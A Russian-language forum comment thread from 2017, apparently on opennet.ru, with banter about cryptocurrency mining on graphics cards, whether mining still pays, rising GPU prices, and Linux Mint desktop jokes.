    - Мой сын вот предприниматель. Ресторанчик открыл. С деньгами не особо, много трудностей со всей это бюрократией в малом бизнесе, но на жизнь вполне хватает. На поддержанную иномарку, за ипотеку заплатить.
    - А мой сын с ума сошел... Ничего у нет, только коробка жужжащая. Один свитер, и то давно рванный. Но все кричит, что он богат, и зарабатывает кучу денег.
     
     
  • 4.72, АнонимХ (ok), 13:37, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    У первого коробка бетонная , какая разница.
     
     
  • 5.101, Аноним (-), 20:28, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > У первого коробка бетонная , какая разница.

    иномарка, чтоб до бетонной коробки ездить, конечно же :)

     
  • 2.98, Linux Mint (?), 20:00, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Кредит за "айфон" уже выплатил или все бутылки в округе собрал?
     
     
  • 3.100, Аноним (-), 20:22, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Айфон только взял, так что по кредиту даже ещё не платил. Но там не очень много, потому что брал восстановленный, так что потяну. Бутылки я не собираю, но регулярно сдаю банки из под своих любимых сортов "Охота" и "Балтика №9". А на десктопе то, конечно, только Линуксы у меня. Целых три. Mint Cinnamon, Mint MATE и Mint KDE - все работают замечательно.
     
     
  • 4.102, Аноним (-), 20:33, 12/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > Айфон только взял, так что по кредиту даже ещё не платил. Но
    > там не очень много, потому что брал восстановленный, так что потяну.
    > Бутылки я не собираю, но регулярно сдаю банки из под своих
    > любимых сортов "Охота" и "Балтика №9". А на десктопе то, конечно,
    > только Линуксы у меня. Целых три. Mint Cinnamon, Mint MATE и
    > Mint KDE - все работают замечательно.

    Ты печень лучше продай, за iPhone рассчитаться. Времени сэкономишь порядком.
    Пивом её убивать намного дольше выходит, да и банки сдавать морока.
    Плюс ещё почки до следующего айфона доживут, тоже профит.

     
     
  • 5.112, Аноним (-), 09:35, 13/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Спасибо за подсказку. Вот собираюсь поставить ещё вдогонку Mint GNOME и Mint LXDE, только вот Mint LXDE может уже не влезть. Не могли бы вы дать ссылку на линукс-программу, которая расширяет диски? Я забыл как она называется. Нужно расширить ещё хотя бы на 5 гигабитов.


     
     
  • 6.121, Аноним (-), 20:52, 13/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    программа называется gparted
     
  • 2.113, Очередной аноним (?), 10:01, 13/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Сколько мегахэшей(гигахэшей) в секунду выдает? Или ты продавец-консультант видеокарт на сдельщине, на проценте от продаж сидишь?

    Хоть и понятно, что это толстый троллинг, но отвечу новичкам, которые не в теме - на видяхах майнить уже бесполезно:

    "Выгодно ли майнить биткойны в 2017?"
    https://bitnovosti.com/2017/02/17/vygodno-li-majnit-bitcoin-v-2017/

    "На сегодняшний день, одним из самых продвинутых майнеров считатется Antminer S9. Он представляет собой то, что принято называть ASIC майнинг-стойкой (фермой). Ее вычислительная мощность достигает 14 TH/s. Воспользовавшись простым калькулятором (на скриншоте выше), мы можем высчитать, что при сегодняшней сложности майнинга заработать можно примерно 1 BTC в месяц."

    1 биткоин В МЕСЯЦ!!! Или твои в твои RX580 засунули квантовый компьютер?

    А может ты не биткоин, а какой-нибудь очередной новый нонеймкоин там майнишь, первый миллион?


    специализированные железки
    https://en.bitcoin.it/wiki/Mining_hardware_comparison

    неспециализированные (историческое, устаревшее, на видяхах никто не майнит):
    https://en.bitcoin.it/wiki/Non-specialized_hardware_comparison

     
     
  • 3.114, Аноним (-), 10:08, 13/06/2017 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > Хоть и понятно, что это толстый троллинг
    > Или ты продавец-консультант видеокарт на сдельщине

    1 биткоин В МЕСЯЦ!!! Или твои в твои RX580 засунули квантовый компьютер?
    А может ты не биткоин, а какой-нибудь очередной новый нонеймкоин там майнишь, первый миллион?

    Так троллинг или ты пытаешься доказать, что я не прав? Логику уже включи.

     
     
  • 4.116, Очередной аноним (?), 10:51, 13/06/2017 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Так троллинг или ты пытаешься доказать, что я не прав?

    клоунада несмешного клоуна

     
  • 3.120, Аноним (-), 18:02, 13/06/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Так какого Х видяхи верхнего сегмента (RX 480/580/etc, GTX 1060/1070)в московских магазинах пропали напрочь? Только на заказ и по +30% цене против той, чтобыла месяц назад. Пишут, что хохлы на фоне "биткоин по $2000" скупили нахрен всё у себя, в России, в Польше и даже Германию высосали. Так значит майнят. А что они там намайнят - это я уже не знаю. Но вот цены на видюши они, гады, не кисло подняли. Устроили дефицит прямо как было в совке.


     
     
  • 4.122, fsdgsdfsagsdfasdf (?), 17:40, 14/06/2017 [^] [^^] [^^^] [ответить]  
  • –1 +/
    цены обваливаются на коины, ждем тонны бу-видеокарт по цене кремниевого мусора.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру